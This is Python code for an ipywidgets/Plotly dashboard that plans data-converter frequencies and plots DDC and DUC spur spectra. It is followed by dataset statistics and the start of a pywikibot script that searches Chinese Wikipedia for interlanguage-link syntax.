        self.param_controls.set_title(0,"RF-DC Parameters")
        self.params = widgets.VBox([self.param_controls, self.mix_mode])
        # Top-level layout: controls on the left, plot on the right.
        self.layout = widgets.HBox([self.params, self._plot])

    def __update_fs(self, change):
        """Push a new sample rate into the model and re-cap bandwidth at Fs/2."""
        self.data.fs_rf = change['new']
        self.bw_slider.max = change['new']/2
        self.bw_entry.max = change['new']/2
        self.__update_plot()

    def __update_fc(self, change):
        """Push a new centre frequency into the model and redraw."""
        self.data.fc = change['new']
        self.__update_plot()

    def __update_bw(self, change):
        """Push a new bandwidth into the model and redraw."""
        self.data.fs_bw = change['new']
        self.__update_plot()

    def __update_pll(self, change):
        """Push a new PLL reference clock into the model and redraw."""
        self.data.pll_ref = change['new']
        self.__update_plot()

    def __update_plot(self):
        """Re-position every trace; spurs hitting the Tx band or its image turn red."""
        # Order must match the spurs built in __setup_plot (offset +8 below:
        # data 0-2 Tx band, 3-5 image band, 6 Nyquist, 7 Nyquist image).
        spurs_list = [self.data.hd2_nyq1,self.data.hd2_nyq2,self.data.hd3_nyq1,self.data.hd3_nyq2,
                      self.data.hd4_nyq1,self.data.hd4_nyq2,self.data.hd5_nyq1,self.data.hd5_nyq2,
                      self.data.pll_mix_up,self.data.pll_mix_up_image,
                      self.data.pll_mix_down,self.data.pll_mix_down_image]
        # batch_update coalesces all trace changes into one redraw.
        with self._plot.batch_update():
            self._plot.data[0].x = [self.data.tx_band['xmin'], self.data.tx_band['xmax']]
            self._plot.data[1].x = [self.data.tx_band['xmin'], self.data.tx_band['xmin']]
            self._plot.data[2].x = [self.data.tx_band['xmax'], self.data.tx_band['xmax']]
            self._plot.data[3].x = [self.data.fimg['xmin'], self.data.fimg['xmax']]
            self._plot.data[4].x = [self.data.fimg['xmin'], self.data.fimg['xmin']]
            self._plot.data[5].x = [self.data.fimg['xmax'], self.data.fimg['xmax']]
            self._plot.data[6].x = [self.data.nyquist['xmax'], self.data.nyquist['xmax']]
            self._plot.data[7].x = [self.data.nyquist_image['xmax'], self.data.nyquist_image['xmax']]
            for i in range(len(spurs_list)):
                self._plot.data[i+8].x = [spurs_list[i]['xmin'], spurs_list[i]['xmax']]
                if self.__intersection(spurs_list[i], self.data.tx_band) or self.__intersection(spurs_list[i], self.data.fimg):
                    # Spur overlaps the transmit band or its image: conflict.
                    self._plot.data[i+8].line['color'] = 'red'
                else:
                    self._plot.data[i+8].line['color'] = spurs_list[i]['color']
        self.mix_mode.value = self.data.mix_mode

    def __setup_plot(self):
        """Build the FigureWidget: Tx band, image band (3 traces each), Nyquist lines, spurs."""
        tx_band = go.Scatter(x=[self.data.tx_band['xmin'], self.data.tx_band['xmax']], y=[self.data.tx_band['ymax'], self.data.tx_band['ymax']], line=dict(color=self.data.tx_band['color']), name=self.data.tx_band['label'], legendgroup="tx", hovertext=self.data.tx_band['label'], hoverinfo='text+x')
        tx_band_l = go.Scatter(x=[self.data.tx_band['xmin'], self.data.tx_band['xmin']], y=[self.data.tx_band['ymin'], self.data.tx_band['ymax']], line=dict(color=self.data.tx_band['color']), name=self.data.tx_band['label'], showlegend=False, legendgroup="tx", hovertext=self.data.tx_band['label'], hoverinfo='text+x')
        tx_band_r = go.Scatter(x=[self.data.tx_band['xmax'], self.data.tx_band['xmax']], y=[self.data.tx_band['ymin'], self.data.tx_band['ymax']], line=dict(color=self.data.tx_band['color']), name=self.data.tx_band['label'], showlegend=False, legendgroup="tx", hovertext=self.data.tx_band['label'], hoverinfo='text+x')
        fimag = go.Scatter(x=[self.data.fimg['xmin'], self.data.fimg['xmax']], y=[self.data.fimg['ymax'], self.data.fimg['ymax']], line=dict(color=self.data.fimg['color']), name=self.data.fimg['label'], legendgroup="fimg", hovertext=self.data.fimg['label'], hoverinfo='text+x')
        fimag_l = go.Scatter(x=[self.data.fimg['xmin'], self.data.fimg['xmin']], y=[self.data.fimg['ymin'], self.data.fimg['ymax']], line=dict(color=self.data.fimg['color']), name=self.data.fimg['label'], showlegend=False, legendgroup="fimg", hovertext=self.data.fimg['label'], hoverinfo='text+x')
        fimag_r = go.Scatter(x=[self.data.fimg['xmax'], self.data.fimg['xmax']], y=[self.data.fimg['ymin'], self.data.fimg['ymax']], line=dict(color=self.data.fimg['color']), name=self.data.fimg['label'], showlegend=False, legendgroup="fimg", hovertext=self.data.fimg['label'], hoverinfo='text+x')
        nyq = go.Scatter(x=[self.data.nyquist['xmin'], self.data.nyquist['xmin']], y=[self.data.nyquist['ymin'], self.data.nyquist['ymax']], line=dict(color=self.data.nyquist['color']), name=self.data.nyquist['label'], hovertext=self.data.nyquist['label'], hoverinfo='text+x')
        nyq_img = go.Scatter(x=[self.data.nyquist_image['xmin'], self.data.nyquist_image['xmin']], y=[self.data.nyquist_image['ymin'], self.data.nyquist_image['ymax']], line=dict(color=self.data.nyquist_image['color']), name=self.data.nyquist_image['label'], hovertext=self.data.nyquist_image['label'], hoverinfo='text+x')
        # Same ordering as __update_plot's spurs_list — keep them in sync.
        spurs_list = [self.data.hd2_nyq1,self.data.hd2_nyq2,self.data.hd3_nyq1,self.data.hd3_nyq2,
                      self.data.hd4_nyq1,self.data.hd4_nyq2,self.data.hd5_nyq1,self.data.hd5_nyq2,
                      self.data.pll_mix_up,self.data.pll_mix_up_image,
                      self.data.pll_mix_down,self.data.pll_mix_down_image]
        spurs = [go.Scatter(x=[d['xmin'], d['xmax']], y=[d['ymax'], d['ymax']], name=d['label'], line=dict(color=d['color']), hovertext=d['label'], hoverinfo='text+x') for d in spurs_list]
        plot_items = [tx_band, tx_band_l, tx_band_r, fimag, fimag_l, fimag_r, nyq, nyq_img] + spurs
        plot = go.FigureWidget(plot_items)
        plot.update_layout(
            title={'text':"Digital Transmitter Frequency Plan", 'x':0.45, 'y':0.9, 'xanchor':'center', 'yanchor':'top'},
            xaxis_title={'text':"Frequency (MHz)"},
            yaxis_title={'text':"Harmonic No."},
            width=plot_width,
            height=plot_height
        )
        return plot

    def __intersection(self, a, b):
        """Return True when intervals *a* and *b* overlap on the x axis.

        Strict inequalities mean touching edges count as an intersection.
        """
        if ((a['xmin'] < b['xmax']) and (a['xmax'] < b['xmin'])) or ((a['xmin'] > b['xmax']) and (a['xmax'] > b['xmin'])):
            return False
        else:
            return True
class DDCWidgets:
    """Interactive view of the digital down-converter (DDC) spur spectrum.

    Driven by a :class:`FrequencyPlannerDDC`.  Controls cover the RF-DC
    parameters (Fs, Fc, PLL ref, NCO, decimation, IL factor) and the spur
    amplitudes (HD2/HD3, GTIS, OIS, PLL-mixing, NSD).  Every spur entry
    from the planner is a dict with ``'x'/'ymin'/'ymax'/'color'/'label'``
    keys, drawn as a vertical line on the plot.
    """

    def __init__(self):
        """Create the planner model, the plot, and all linked controls."""
        self.data = FrequencyPlannerDDC()
        self._plot = self.__setup_plot()
        # Shared widget layouts so every row lines up in the accordions.
        self._label_layout = widgets.Layout(width='90px')
        self._slider_layout = widgets.Layout(width='120px')
        self._entry_layout = widgets.Layout(width='90px')
        self._units_layout = widgets.Layout(width='55px')
        # NOTE(review): not referenced elsewhere in this class.
        self._button_layout = widgets.Layout(width='87px', fontsize=12)
        # Each control row: label | slider (or blank) | entry | units.
        # Slider and entry stay in sync via jslink; observers push the
        # value into the planner model and redraw.
        self.fs_label = widgets.Label("Fs", layout=self._label_layout)
        self.fs_slider = widgets.FloatSlider(value=self.data.fs_rf, min=1000.0, max=4096.0, step=0.01, readout=False, layout=self._slider_layout)
        self.fs_entry = widgets.BoundedFloatText(value=self.fs_slider.value, min=self.fs_slider.min, max=self.fs_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.fs_units = widgets.Label("MSPS", layout=self._units_layout)
        widgets.jslink((self.fs_slider, 'value'), (self.fs_entry, 'value'))
        self.fs_slider.observe(self.__update_fs, 'value')
        self.fc_label = widgets.Label("Fc", layout=self._label_layout)
        self.fc_slider = widgets.FloatSlider(value=self.data.fc, min=0, max=4096.0, step=0.01, readout=False, layout=self._slider_layout)
        self.fc_entry = widgets.BoundedFloatText(value=self.fc_slider.value, min=self.fc_slider.min, max=self.fc_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.fc_units = widgets.Label("MHz", layout=self._units_layout)
        widgets.jslink((self.fc_slider, 'value'), (self.fc_entry, 'value'))
        self.fc_slider.observe(self.__update_fc, 'value')
        self.pll_label = widgets.Label("PLL Ref Clk", layout=self._label_layout)
        self.pll_slider = widgets.FloatSlider(value=self.data.pll_ref, min=102.4, max=615.0, step=0.01, readout=False, layout=self._slider_layout)
        self.pll_entry = widgets.BoundedFloatText(value=self.pll_slider.value, min=self.pll_slider.min, max=self.pll_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.pll_units = widgets.Label("MHz", layout=self._units_layout)
        widgets.jslink((self.pll_slider, 'value'), (self.pll_entry, 'value'))
        self.pll_slider.observe(self.__update_pll, 'value')
        # Decimation and IL factor are discrete dropdown choices.
        self.dec_label = widgets.Label("Decimation", layout=self._label_layout)
        self.dec_blank = widgets.Label("", layout=self._slider_layout)
        self.dec_entry = widgets.Dropdown(options=["1", "2","4","8"],value=str(self.data.dec), layout=self._entry_layout)
        self.dec_units = widgets.Label("X", layout=self._units_layout)
        self.dec_entry.observe(self.__update_dec, 'value')
        self.il_label = widgets.Label("IL Factor", layout=self._label_layout)
        self.il_blank = widgets.Label("", layout=self._slider_layout)
        self.il_entry = widgets.Dropdown(options=["4","8"],value=str(self.data.il_factor), layout=self._entry_layout)
        self.il_units = widgets.Label("X", layout=self._units_layout)
        self.il_entry.observe(self.__update_il, 'value')
        # NCO may be negative (down- or up-shifting the band).
        self.nco_label = widgets.Label("NCO", layout=self._label_layout)
        self.nco_slider = widgets.FloatSlider(value=self.data.nco, min=-4096.0, max=4096.0, step=0.01, readout=False, layout=self._slider_layout)
        self.nco_entry = widgets.BoundedFloatText(value=self.nco_slider.value, min=self.nco_slider.min, max=self.nco_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.nco_units = widgets.Label("MHz", layout=self._units_layout)
        widgets.jslink((self.nco_slider, 'value'), (self.nco_entry, 'value'))
        self.nco_slider.observe(self.__update_nco, 'value')
        # Spur-amplitude controls (second accordion), all in dB.
        self.hd2_label = widgets.Label("HD2", layout=self._label_layout)
        self.hd2_slider = widgets.FloatSlider(value=self.data.hd2_db, min=0, max=200, step=0.01, readout=False, layout=self._slider_layout)
        self.hd2_entry = widgets.BoundedFloatText(value=self.hd2_slider.value, min=self.hd2_slider.min, max=self.hd2_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.hd2_units = widgets.Label("dB", layout=self._units_layout)
        widgets.jslink((self.hd2_slider, 'value'), (self.hd2_entry, 'value'))
        self.hd2_slider.observe(self.__update_hd2, 'value')
        self.hd3_label = widgets.Label("HD3", layout=self._label_layout)
        self.hd3_slider = widgets.FloatSlider(value=self.data.hd3_db, min=0, max=200, step=0.01, readout=False, layout=self._slider_layout)
        self.hd3_entry = widgets.BoundedFloatText(value=self.hd3_slider.value, min=self.hd3_slider.min, max=self.hd3_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.hd3_units = widgets.Label("dB", layout=self._units_layout)
        widgets.jslink((self.hd3_slider, 'value'), (self.hd3_entry, 'value'))
        self.hd3_slider.observe(self.__update_hd3, 'value')
        self.tis_label = widgets.Label("GTIS", layout=self._label_layout)
        self.tis_slider = widgets.FloatSlider(value=self.data.tis_spur_db, min=0, max=200, step=0.01, readout=False, layout=self._slider_layout)
        self.tis_entry = widgets.BoundedFloatText(value=self.tis_slider.value, min=self.tis_slider.min, max=self.tis_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.tis_units = widgets.Label("dB", layout=self._units_layout)
        widgets.jslink((self.tis_slider, 'value'), (self.tis_entry, 'value'))
        self.tis_slider.observe(self.__update_tis, 'value')
        self.oss_label = widgets.Label("OIS", layout=self._label_layout)
        self.oss_slider = widgets.FloatSlider(value=self.data.off_spur_db, min=0, max=200, step=0.01, readout=False, layout=self._slider_layout)
        self.oss_entry = widgets.BoundedFloatText(value=self.oss_slider.value, min=self.oss_slider.min, max=self.oss_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.oss_units = widgets.Label("dB", layout=self._units_layout)
        widgets.jslink((self.oss_slider, 'value'), (self.oss_entry, 'value'))
        self.oss_slider.observe(self.__update_oss, 'value')
        self.pdb_label = widgets.Label("PLL Ref Mixing", layout=self._label_layout)
        self.pdb_slider = widgets.FloatSlider(value=self.data.pll_mix_db, min=0, max=200, step=0.01, readout=False, layout=self._slider_layout)
        self.pdb_entry = widgets.BoundedFloatText(value=self.pdb_slider.value, min=self.pdb_slider.min, max=self.pdb_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.pdb_units = widgets.Label("dB", layout=self._units_layout)
        widgets.jslink((self.pdb_slider, 'value'), (self.pdb_entry, 'value'))
        self.pdb_slider.observe(self.__update_pdb, 'value')
        self.nsd_label = widgets.Label("NSD", layout=self._label_layout)
        self.nsd_slider = widgets.FloatSlider(value=self.data.nsd_db, min=-300, max=0, step=0.01, readout=False, layout=self._slider_layout)
        self.nsd_entry = widgets.BoundedFloatText(value=self.nsd_slider.value, min=self.nsd_slider.min, max=self.nsd_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.nsd_units = widgets.Label("dBFs/Hz", layout=self._units_layout)
        widgets.jslink((self.nsd_slider, 'value'), (self.nsd_entry, 'value'))
        self.nsd_slider.observe(self.__update_nsd, 'value')
        self.param_controls = widgets.Accordion([widgets.VBox([
            widgets.HBox([self.fs_label, self.fs_slider, self.fs_entry, self.fs_units]),
            widgets.HBox([self.fc_label, self.fc_slider, self.fc_entry, self.fc_units]),
            widgets.HBox([self.pll_label, self.pll_slider, self.pll_entry, self.pll_units]),
            widgets.HBox([self.nco_label, self.nco_slider, self.nco_entry, self.nco_units]),
            widgets.HBox([self.dec_label, self.dec_blank, self.dec_entry, self.dec_units]),
            widgets.HBox([self.il_label, self.il_blank, self.il_entry, self.il_units])])
        ])
        self.param_controls.set_title(0,"RF-DC Parameters")
        self.amp_controls = widgets.Accordion([widgets.VBox([
            widgets.HBox([self.hd2_label, self.hd2_slider, self.hd2_entry, self.hd2_units]),
            widgets.HBox([self.hd3_label, self.hd3_slider, self.hd3_entry, self.hd3_units]),
            widgets.HBox([self.tis_label, self.tis_slider, self.tis_entry, self.tis_units]),
            widgets.HBox([self.oss_label, self.oss_slider, self.oss_entry, self.oss_units]),
            widgets.HBox([self.pdb_label, self.pdb_slider, self.pdb_entry, self.pdb_units]),
            widgets.HBox([self.nsd_label, self.nsd_slider, self.nsd_entry, self.nsd_units])])
        ])
        self.amp_controls.set_title(0,"Spur Amplitude")
        self.params = widgets.VBox([self.param_controls, self.amp_controls])
        # Top-level layout: controls on the left, plot on the right.
        self.layout = widgets.HBox([self.params, self._plot])

    def __update_fs(self, change):
        """Push a new sample rate into the model and redraw."""
        self.data.fs_rf = change['new']
        self.__update_plot()

    def __update_fc(self, change):
        """Push a new centre frequency into the model and redraw."""
        self.data.fc = change['new']
        self.__update_plot()

    def __update_dec(self, change):
        """Push a new decimation factor (as int) into the model and redraw."""
        self.data.dec = int(change['new'])
        self.__update_plot()

    def __update_il(self, change):
        """Push a new interleaving factor (as int) into the model and redraw."""
        self.data.il_factor = int(change['new'])
        self.__update_plot()

    def __update_pll(self, change):
        """Push a new PLL reference clock into the model and redraw."""
        self.data.pll_ref = change['new']
        self.__update_plot()

    def __update_nco(self, change):
        """Push a new NCO frequency into the model and redraw."""
        self.data.nco = change['new']
        self.__update_plot()

    def __update_hd2(self, change):
        """Push a new HD2 amplitude (dB) into the model and redraw."""
        self.data.hd2_db = change['new']
        self.__update_plot()

    def __update_hd3(self, change):
        """Push a new HD3 amplitude (dB) into the model and redraw."""
        self.data.hd3_db = change['new']
        self.__update_plot()

    def __update_tis(self, change):
        """Push a new GTIS spur amplitude (dB) into the model and redraw."""
        self.data.tis_spur_db = change['new']
        self.__update_plot()

    def __update_oss(self, change):
        """Push a new offset-spur amplitude (dB) into the model and redraw."""
        self.data.off_spur_db = change['new']
        self.__update_plot()

    def __update_pdb(self, change):
        """Push a new PLL-mixing spur amplitude (dB) into the model and redraw."""
        self.data.pll_mix_db = change['new']
        self.__update_plot()

    def __update_nsd(self, change):
        """Push a new noise spectral density (dBFs/Hz) into the model and redraw."""
        self.data.nsd_db = change['new']
        self.__update_plot()

    def __setup_plot(self):
        """Build the FigureWidget: one vertical line per spur in spurs_list order."""
        # Same ordering as __update_plot's spurs_list — keep them in sync.
        spurs_list = [self.data.rx_alias, self.data.rx_image, self.data.nyquist_up, self.data.nyquist_down,
                      self.data.hd2, self.data.hd2_image, self.data.hd3, self.data.hd3_image,
                      self.data.pll_mix_up, self.data.pll_mix_up_image, self.data.pll_mix_down, self.data.pll_mix_down_image,
                      self.data.tis_spur, self.data.tis_spur_image, self.data.offset_spur, self.data.offset_spur_image]
        plot_items = [go.Scatter(x=[d['x'], d['x']], y=[d['ymin'], d['ymax']], name=d['label'], line=dict(color=d['color']), hovertext=d['label'], hoverinfo='text+x') for d in spurs_list]
        plot = go.FigureWidget(plot_items)
        plot.update_layout(
            title={'text':"Digital Down Converter (DDC)", 'x':0.45, 'y':0.9, 'xanchor':'center', 'yanchor':'top'},
            xaxis_title={'text':"Frequency (MHz)"},
            yaxis_title={'text':"Amplitude (dB)"},
            width=plot_width,
            height=plot_height
        )
        # plot.add_hline(y=0, line=dict(color='grey'))
        return plot

    def __update_plot(self):
        """Re-position every spur line (both x and y) from the model in one batch."""
        # Order must match the traces built in __setup_plot.
        spurs_list = [self.data.rx_alias, self.data.rx_image, self.data.nyquist_up, self.data.nyquist_down,
                      self.data.hd2, self.data.hd2_image, self.data.hd3, self.data.hd3_image,
                      self.data.pll_mix_up, self.data.pll_mix_up_image, self.data.pll_mix_down, self.data.pll_mix_down_image,
                      self.data.tis_spur, self.data.tis_spur_image, self.data.offset_spur, self.data.offset_spur_image]
        with self._plot.batch_update():
            for i in range(len(spurs_list)):
                self._plot.data[i].x = [spurs_list[i]['x'], spurs_list[i]['x']]
                self._plot.data[i].y = [spurs_list[i]['ymin'], spurs_list[i]['ymax']]
class DUCWidgets:
    """Interactive dashboard for the Digital Up Converter (DUC) frequency planner.

    Wires ipywidgets controls (sliders, numeric entries, dropdowns) to a
    ``FrequencyPlannerDUC`` model and a Plotly ``FigureWidget`` that draws
    the fundamental, its image, and the Nyquist/HD2/HD3/PLL-mixing spurs as
    vertical lines.  Every control observer writes the new value into the
    model and refreshes the figure plus the read-only status labels.
    """
    def __init__(self):
        self.data = FrequencyPlannerDUC()
        self._plot = self.__setup_plot()
        # Shared layouts keep each "label | slider | entry | units" row aligned.
        self._label_layout = widgets.Layout(width='90px')
        self._slider_layout = widgets.Layout(width='120px')
        self._entry_layout = widgets.Layout(width='90px')
        self._units_layout = widgets.Layout(width='37px')
        self._button_layout = widgets.Layout(width='87px', fontsize=12)
        # RF sample rate (Fs).  Slider and entry are linked in the browser via
        # jslink, so only the slider needs a Python-side observer.
        self.fs_label = widgets.Label("Fs", layout=self._label_layout)
        self.fs_slider = widgets.FloatSlider(value=self.data.fs_rf, min=1000.0, max=6554.0, step=0.01, readout=False, layout=self._slider_layout)
        self.fs_entry = widgets.BoundedFloatText(value=self.fs_slider.value, min=self.fs_slider.min, max=self.fs_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.fs_units = widgets.Label("MSPS", layout=self._units_layout)
        widgets.jslink((self.fs_slider, 'value'), (self.fs_entry, 'value'))
        self.fs_slider.observe(self.__update_fs, 'value')
        # Carrier frequency (Fc).
        self.fc_label = widgets.Label("Fc", layout=self._label_layout)
        self.fc_slider = widgets.FloatSlider(value=self.data.fc, min=0, max=6554.0, step=0.01, readout=False, layout=self._slider_layout)
        self.fc_entry = widgets.BoundedFloatText(value=self.fc_slider.value, min=self.fc_slider.min, max=self.fc_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.fc_units = widgets.Label("MHz", layout=self._units_layout)
        widgets.jslink((self.fc_slider, 'value'), (self.fc_entry, 'value'))
        self.fc_slider.observe(self.__update_fc, 'value')
        # NCO frequency (range allows negative values).
        self.nco_label = widgets.Label("NCO", layout=self._label_layout)
        self.nco_slider = widgets.FloatSlider(value=self.data.nco, min=-6554.0, max=6554.0, step=0.01, readout=False, layout=self._slider_layout)
        self.nco_entry = widgets.BoundedFloatText(value=self.nco_slider.value, min=self.nco_slider.min, max=self.nco_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.nco_units = widgets.Label("MHz", layout=self._units_layout)
        widgets.jslink((self.nco_slider, 'value'), (self.nco_entry, 'value'))
        self.nco_slider.observe(self.__update_nco, 'value')
        # PLL reference clock.
        self.pll_label = widgets.Label("PLL Ref Clk", layout=self._label_layout)
        self.pll_slider = widgets.FloatSlider(value=self.data.pll_ref, min=102.4, max=615.0, step=0.01, readout=False, layout=self._slider_layout)
        self.pll_entry = widgets.BoundedFloatText(value=self.pll_slider.value, min=self.pll_slider.min, max=self.pll_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.pll_units = widgets.Label("MHz", layout=self._units_layout)
        widgets.jslink((self.pll_slider, 'value'), (self.pll_entry, 'value'))
        self.pll_slider.observe(self.__update_pll, 'value')
        # Interpolation rate (dropdown of strings; blank label keeps alignment).
        self.itrp_label = widgets.Label("Interpolation", layout=self._label_layout)
        self.itrp_blank = widgets.Label("", layout=self._slider_layout)
        self.itrp_entry = widgets.Dropdown(options=["1", "2","4","8"],value=str(self.data.interp_rate), layout=self._entry_layout)
        self.itrp_units = widgets.Label("X", layout=self._units_layout)
        self.itrp_entry.observe(self.__update_itrp, 'value')
        # Inverse-sinc filter toggle.
        # NOTE(review): initial value is hard-coded to "ON" instead of being
        # derived from self.data.inv_sinc like the other controls -- confirm intended.
        self.sinc_label = widgets.Label("Inverse Sinc", layout=self._label_layout)
        self.sinc_blank = widgets.Label("", layout=self._slider_layout)
        self.sinc_entry = widgets.Dropdown(options=["ON", "OFF"],value="ON", layout=self._entry_layout)
        self.sinc_units = widgets.Label("X", layout=self._units_layout)
        self.sinc_entry.observe(self.__update_sinc, 'value')
        # Spur amplitude controls (dB).
        self.hd2_label = widgets.Label("HD2", layout=self._label_layout)
        self.hd2_slider = widgets.FloatSlider(value=self.data.hd2_db, min=0, max=200, step=0.01, readout=False, layout=self._slider_layout)
        self.hd2_entry = widgets.BoundedFloatText(value=self.hd2_slider.value, min=self.hd2_slider.min, max=self.hd2_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.hd2_units = widgets.Label("dB", layout=self._units_layout)
        widgets.jslink((self.hd2_slider, 'value'), (self.hd2_entry, 'value'))
        self.hd2_slider.observe(self.__update_hd2, 'value')
        self.hd3_label = widgets.Label("HD3", layout=self._label_layout)
        self.hd3_slider = widgets.FloatSlider(value=self.data.hd3_db, min=0, max=200, step=0.01, readout=False, layout=self._slider_layout)
        self.hd3_entry = widgets.BoundedFloatText(value=self.hd3_slider.value, min=self.hd3_slider.min, max=self.hd3_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.hd3_units = widgets.Label("dB", layout=self._units_layout)
        widgets.jslink((self.hd3_slider, 'value'), (self.hd3_entry, 'value'))
        self.hd3_slider.observe(self.__update_hd3, 'value')
        self.pdb_label = widgets.Label("PLL Ref Mixing", layout=self._label_layout)
        self.pdb_slider = widgets.FloatSlider(value=self.data.pll_db, min=0, max=200, step=0.01, readout=False, layout=self._slider_layout)
        self.pdb_entry = widgets.BoundedFloatText(value=self.pdb_slider.value, min=self.pdb_slider.min, max=self.pdb_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.pdb_units = widgets.Label("dB", layout=self._units_layout)
        widgets.jslink((self.pdb_slider, 'value'), (self.pdb_entry, 'value'))
        self.pdb_slider.observe(self.__update_pdb, 'value')
        # Read-only status labels, refreshed on every plot update.
        self.mix_mode = widgets.Label(self.data.mix_mode, layout=widgets.Layout(flex='auto'))
        self.eff_fs = widgets.Label(("Effective Fs: " + str(self.data.effective_fs)) + " MSPS", layout=widgets.Layout(flex='auto'))
        # Assemble the control panel and the overall layout.
        self.param_controls = widgets.Accordion([widgets.VBox([
            widgets.HBox([self.fs_label, self.fs_slider, self.fs_entry, self.fs_units]),
            widgets.HBox([self.fc_label, self.fc_slider, self.fc_entry, self.fc_units]),
            widgets.HBox([self.pll_label, self.pll_slider, self.pll_entry, self.pll_units]),
            widgets.HBox([self.nco_label, self.nco_slider, self.nco_entry, self.nco_units]),
            widgets.HBox([self.itrp_label, self.itrp_blank, self.itrp_entry, self.itrp_units]),
            widgets.HBox([self.sinc_label, self.sinc_blank, self.sinc_entry, self.sinc_units])])
        ])
        self.param_controls.set_title(0, "RF-DC Parameters")
        self.amp_controls = widgets.Accordion([widgets.VBox([
            widgets.HBox([self.hd2_label, self.hd2_slider, self.hd2_entry, self.hd2_units]),
            widgets.HBox([self.hd3_label, self.hd3_slider, self.hd3_entry, self.hd3_units]),
            widgets.HBox([self.pdb_label, self.pdb_slider, self.pdb_entry, self.pdb_units])])
        ])
        self.amp_controls.set_title(0, "Spur Amplitude")
        self.params = widgets.VBox([
            self.param_controls,
            self.amp_controls,
            widgets.HBox([self.mix_mode]),
            widgets.HBox([self.eff_fs])
        ])
        self.layout = widgets.HBox([self.params, self._plot])
    def __update_fs(self, change):
        """Observer: new RF sample rate (MSPS)."""
        self.data.fs_rf = change['new']
        self.__update_plot()
    def __update_fc(self, change):
        """Observer: new carrier frequency (MHz)."""
        self.data.fc = change['new']
        self.__update_plot()
    def __update_pll(self, change):
        """Observer: new PLL reference clock (MHz)."""
        self.data.pll_ref = change['new']
        self.__update_plot()
    def __update_nco(self, change):
        """Observer: new NCO frequency (MHz)."""
        self.data.nco = change['new']
        self.__update_plot()
    def __update_itrp(self, change):
        """Observer: new interpolation rate (dropdown supplies a string)."""
        self.data.interp_rate = int(change['new'])
        self.__update_plot()
    def __update_sinc(self, change):
        """Observer: toggle the inverse-sinc filter flag."""
        self.data.inv_sinc = change['new'] == "ON"
        self.__update_plot()
    def __update_hd2(self, change):
        """Observer: new HD2 spur amplitude (dB)."""
        self.data.hd2_db = change['new']
        self.__update_plot()
    def __update_hd3(self, change):
        """Observer: new HD3 spur amplitude (dB)."""
        self.data.hd3_db = change['new']
        self.__update_plot()
    def __update_pdb(self, change):
        """Observer: new PLL-reference-mixing spur amplitude (dB)."""
        self.data.pll_db = change['new']
        self.__update_plot()
    def __spurs(self):
        """Model spurs in the fixed order shared by setup and update."""
        return [self.data.fund, self.data.fimag,
                self.data.nyquist_up, self.data.nyquist_down, self.data.hd2, self.data.hd2_image,
                self.data.hd3, self.data.hd3_image, self.data.pll_mix_up, self.data.pll_mix_up_image,
                self.data.pll_mix_down, self.data.pll_mix_down_image]
    def __setup_plot(self):
        """Build the FigureWidget with one vertical-line trace per spur."""
        plot_items = [go.Scatter(x=[d['x'], d['x']], y=[d['ymin'], d['ymax']], name=d['label'], line=dict(color=d['color']), hovertext=d['label'], hoverinfo='text+x') for d in self.__spurs()]
        plot = go.FigureWidget(plot_items)
        plot.update_layout(
            title={'text':"Digital Up Converter (DUC)", 'x':0.46, 'y':0.9, 'xanchor':'center', 'yanchor':'top'},
            xaxis_title={'text':"Frequency (MHz)"},
            yaxis_title={'text':"Amplitude (dB)"},
            width=plot_width,
            height=plot_height
        )
        return plot
    def __update_plot(self):
        """Refresh every trace and the status labels from the model."""
        with self._plot.batch_update():
            # Trace order matches the list returned by __spurs().
            for trace, spur in zip(self._plot.data, self.__spurs()):
                trace.x = [spur['x'], spur['x']]
                trace.y = [spur['ymin'], spur['ymax']]
        self.mix_mode.value = self.data.mix_mode
        self.eff_fs.value = ("Effective Fs: " + str(self.data.effective_fs) + " MSPS")
| 62.22807
| 324
| 0.65203
| 6,036
| 42,564
| 4.34609
| 0.041584
| 0.093013
| 0.013342
| 0.024016
| 0.918157
| 0.891206
| 0.872565
| 0.862616
| 0.84691
| 0.828537
| 0
| 0.01901
| 0.195447
| 42,564
| 683
| 325
| 62.31918
| 0.747029
| 0.004464
| 0
| 0.720887
| 0
| 0
| 0.055158
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081331
| false
| 0
| 0.005545
| 0
| 0.109057
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d21e5b0d028aff25fdff617afe0a9aa252c38c5a
| 4,594
|
py
|
Python
|
marklinkstyle.py
|
Peace1-zhwiki/MOSIW
|
13a97842ef53fd500296d3569e548a83e12698d1
|
[
"MIT"
] | null | null | null |
marklinkstyle.py
|
Peace1-zhwiki/MOSIW
|
13a97842ef53fd500296d3569e548a83e12698d1
|
[
"MIT"
] | null | null | null |
marklinkstyle.py
|
Peace1-zhwiki/MOSIW
|
13a97842ef53fd500296d3569e548a83e12698d1
|
[
"MIT"
] | null | null | null |
import pywikibot
from pywikibot import pagegenerators
import regex as re #use this rather than "re" to avoid the "look-behind requires fixed-width pattern" error
# Connect to the Chinese Wikipedia.
site = pywikibot.Site('zh','wikipedia')
# Cheap CirrusSearch query: any page containing an [[:xx: style prefix.
# (Kept short -- the full pattern below exceeds the search API's length limit.)
ilh_search0 = r'insource:/\[\[\:([A-Za-z\-]{2,})\:/i'
# Full pattern: an [[:xx: link whose prefix is a known language code and is
